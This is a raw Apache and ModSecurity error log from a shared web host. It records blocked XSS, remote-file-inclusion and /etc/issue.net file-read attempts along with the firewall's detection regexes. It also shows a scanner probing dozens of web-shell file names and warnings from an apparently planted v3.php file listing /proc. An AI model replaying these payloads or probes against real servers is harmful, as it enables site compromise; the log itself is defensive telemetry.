[Tue May 12 06:27:27.319958 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://s.Aleoklop.Atarget=\\x22_Blank\\x22 hrefmailto:e@Ehostingpoint.com/info.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Middle-aged evening dress shop</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1 [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
[Tue May 12 06:27:27.320369 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
[Tue May 12 06:27:27.320629 2026] [security2:error] [pid 1825179:tid 1825209] [client 27.78.84.116:60062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsL9r1yOh9Tvizeziw0QAAAEs"]
PHP Warning:  filesize(): stat failed for /proc/38/task/38/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/38/task/38/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/38/task/38/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/38/task/38/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/38/task/38/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/38/task/38/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:27:49.708665 2026] [authz_core:error] [pid 1842385:tid 1842408] [client 47.128.125.75:52072] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-bindings/error_log
[Tue May 12 06:27:50.265969 2026] [security2:error] [pid 1825179:tid 1825200] [client 52.45.15.233:52341] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://193.252.222.41 found within ARGS:url: http://193.252.222.41/Version4/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsRtr1yOh9Tvizeziw5AAAAEI"]
[Tue May 12 06:27:50.266411 2026] [security2:error] [pid 1825179:tid 1825200] [client 52.45.15.233:52341] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsRtr1yOh9Tvizeziw5AAAAEI"]
[Tue May 12 06:27:50.266640 2026] [security2:error] [pid 1825179:tid 1825200] [client 52.45.15.233:52341] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKsRtr1yOh9Tvizeziw5AAAAEI"]
PHP Warning:  filesize(): stat failed for /proc/15/task/15/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/15/task/15/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/15/task/15/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/15/task/15/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/15/task/15/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/15/task/15/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:28:36.436436 2026] [:error] [pid 1820198:tid 1820224] [client 92.177.41.231:41620] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:28:50.022000 2026] [:error] [pid 1808852:tid 1808857] [client 37.27.105.41:4814] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Tue May 12 06:28:50.235149 2026] [:error] [pid 1825179:tid 1825206] [client 37.27.105.41:4821] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Tue May 12 06:28:50.511374 2026] [security2:error] [pid 1842385:tid 1842414] [client 180.153.236.243:31737] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/140.0.0.0 safari/537.36 edg/140.0.0.0; 360spider"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKsghs7kySIUZ3ORnI5CwAAARc"], referer: https://www.tchatbooster.com/
[Tue May 12 06:28:50.516018 2026] [security2:error] [pid 1842385:tid 1842414] [client 180.153.236.243:31737] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agKsghs7kySIUZ3ORnI5CwAAARc"], referer: https://www.tchatbooster.com/
[Tue May 12 06:28:51.050100 2026] [security2:error] [pid 1842385:tid 1842414] [client 180.153.236.243:31737] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKsghs7kySIUZ3ORnI5CwAAARc"], referer: https://www.tchatbooster.com/
[Tue May 12 06:29:01.045154 2026] [authz_core:error] [pid 1844863:tid 1844892] [client 111.225.148.202:43508] AH01630: client denied by server configuration: /home/piregwan/public_html/testmail/error_log
[Tue May 12 06:29:08.030486 2026] [:error] [pid 1825287:tid 1825313] [client 103.112.239.35:60054] File does not exist: /home/piregwan/public_html/xmlrpc.php
PHP Warning:  filesize(): stat failed for /proc/854/task/854/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/854/task/854/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/854/task/854/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/854/task/854/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/854/task/854/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/854/task/854/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:29:30.612357 2026] [security2:error] [pid 1825287:tid 1825323] [client 216.73.216.110:46270] ModSecurity: Warning. Matched phrase "etc/issue" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/issue found within ARGS:filesrc: /etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKsqggpmE1yW0glLdhAAgAAANI"]
[Tue May 12 06:29:30.612993 2026] [security2:error] [pid 1825287:tid 1825323] [client 216.73.216.110:46270] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKsqggpmE1yW0glLdhAAgAAANI"]
[Tue May 12 06:29:30.698304 2026] [security2:error] [pid 1825287:tid 1825323] [client 216.73.216.110:46270] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKsqggpmE1yW0glLdhAAgAAANI"]
[Tue May 12 06:29:48.856034 2026] [security2:error] [pid 1842385:tid 1842408] [client 43.157.148.38:57168] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/gaziniere/"] [unique_id "agKsvBs7kySIUZ3ORnI5OAAAARE"]
[Tue May 12 06:29:51.235634 2026] [security2:error] [pid 1820198:tid 1820200] [client 43.135.183.82:51442] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/retrouvez-nous-sur-facebook/"] [unique_id "agKsv81tk6y7yBJLpJpI5wAAAIA"]
[Tue May 12 06:29:52.308677 2026] [security2:error] [pid 1844863:tid 1844871] [client 43.135.145.77:55092] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/gaston/"] [unique_id "agKswPaAnTZtx1_H_wzKfAAAAUI"]
[Tue May 12 06:30:04.523523 2026] [security2:error] [pid 1825179:tid 1825204] [client 43.159.148.221:59838] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKszNr1yOh9TvizezixPwAAAEY"]
[Tue May 12 06:30:08.384491 2026] [autoindex:error] [pid 1825287:tid 1825307] [client 3.18.186.238:47361] AH01276: Cannot serve directory /home/totalcloud/public_html/sitebuilder/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 06:30:08.385123 2026] [core:error] [pid 1825287:tid 1825307] [client 3.18.186.238:47361] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:30:15.217534 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/admin.php
[Tue May 12 06:30:15.442434 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/inputs.php
[Tue May 12 06:30:15.667412 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/file.php
[Tue May 12 06:30:15.892497 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/goods.php
[Tue May 12 06:30:16.117378 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/ms-edit.php
[Tue May 12 06:30:16.342391 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/simple.php
[Tue May 12 06:30:16.584032 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/bgymj.php
[Tue May 12 06:30:17.050692 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/404.php
[Tue May 12 06:30:17.275597 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/file3.php
[Tue May 12 06:30:17.500490 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/wp-mail.php
[Tue May 12 06:30:17.725398 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/about.php
[Tue May 12 06:30:17.950476 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/wp.php
[Tue May 12 06:30:19.574310 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/adminfuns.php
[Tue May 12 06:30:19.800959 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/php8.php
[Tue May 12 06:30:20.026246 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/classwithtostring.php
[Tue May 12 06:30:20.251283 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/info.php
[Tue May 12 06:30:20.476494 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/ioxi-o.php
[Tue May 12 06:30:20.701446 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/011i.php
[Tue May 12 06:30:20.926545 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/edit.php
[Tue May 12 06:30:21.179345 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/sid3.php
[Tue May 12 06:30:21.421178 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/load.php
[Tue May 12 06:30:21.646216 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/166.php
[Tue May 12 06:30:21.871231 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/wp-mail.php
[Tue May 12 06:30:22.096259 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/leaf.php
[Tue May 12 06:30:22.321528 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/grsiuk.php
[Tue May 12 06:30:22.546543 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/8.php
[Tue May 12 06:30:22.772517 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/fs.php
[Tue May 12 06:30:22.997808 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/ws38.php
[Tue May 12 06:30:23.222636 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/a7.php
[Tue May 12 06:30:23.295389 2026] [core:error] [pid 1825179:tid 1825200] [client 193.32.162.60:53006] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:30:23.295412 2026] [core:error] [pid 1825179:tid 1825200] [client 193.32.162.60:53006] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 06:30:23.447359 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/classsmtps.php
[Tue May 12 06:30:23.672116 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/amax.php
[Tue May 12 06:30:23.898735 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/CDX1.php
[Tue May 12 06:30:24.123553 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/rip.php
[Tue May 12 06:30:24.348382 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/1.php
[Tue May 12 06:30:24.607652 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/chosen.php
[Tue May 12 06:30:24.842734 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/css.php
[Tue May 12 06:30:25.067179 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/php.php
[Tue May 12 06:30:25.291739 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/wp-Blogs.php
[Tue May 12 06:30:25.967870 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/ws83.php
[Tue May 12 06:30:26.197693 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/file61.php
[Tue May 12 06:30:26.459356 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/sadcut1.php
[Tue May 12 06:30:26.683961 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/y.php
[Tue May 12 06:30:26.908523 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/akcc.php
[Tue May 12 06:30:27.582828 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/term.php
[Tue May 12 06:30:27.807328 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/666.php
[Tue May 12 06:30:28.032322 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/7.php
[Tue May 12 06:30:28.257751 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/wp-config-sample.php
[Tue May 12 06:30:28.482180 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/log.php
[Tue May 12 06:30:28.706613 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/a5.php
[Tue May 12 06:30:28.931491 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/aa.php
[Tue May 12 06:30:29.156138 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/bolt.php
[Tue May 12 06:30:29.381329 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/x.php
[Tue May 12 06:30:29.648530 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/jga.php
[Tue May 12 06:30:29.873589 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/k.php
[Tue May 12 06:30:30.098618 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/vx.php
[Tue May 12 06:30:30.323411 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/ws77.php
[Tue May 12 06:30:30.548191 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/2.php
[Tue May 12 06:30:30.773150 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/abcd.php
[Tue May 12 06:30:31.222875 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/asd.php
[Tue May 12 06:30:32.129352 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/default.php
[Tue May 12 06:30:32.499287 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/gettest.php
[Tue May 12 06:30:32.724101 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/install.php
[Tue May 12 06:30:32.948609 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/tfm.php
[Tue May 12 06:30:33.173429 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/ws81.php
[Tue May 12 06:30:33.398106 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/222.php
[Tue May 12 06:30:33.622976 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/t.php
[Tue May 12 06:30:34.072751 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/6xBAm3vODE05BSzkJZRAws.php
[Tue May 12 06:30:34.311766 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/a.php
[Tue May 12 06:30:34.557808 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/a1.php
[Tue May 12 06:30:34.782868 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/onclickfuns.php
[Tue May 12 06:30:35.008196 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/w.php
[Tue May 12 06:30:35.682901 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/wp-good.php
[Tue May 12 06:30:35.907818 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/.info.php
[Tue May 12 06:30:36.132772 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/config.php
[Tue May 12 06:30:36.357682 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/item.php
[Tue May 12 06:30:36.582720 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/m.php
[Tue May 12 06:30:36.807632 2026] [:error] [pid 1842385:tid 1842405] [client 20.44.177.173:10441] File does not exist: /home/apoefr/public_html/rh.php
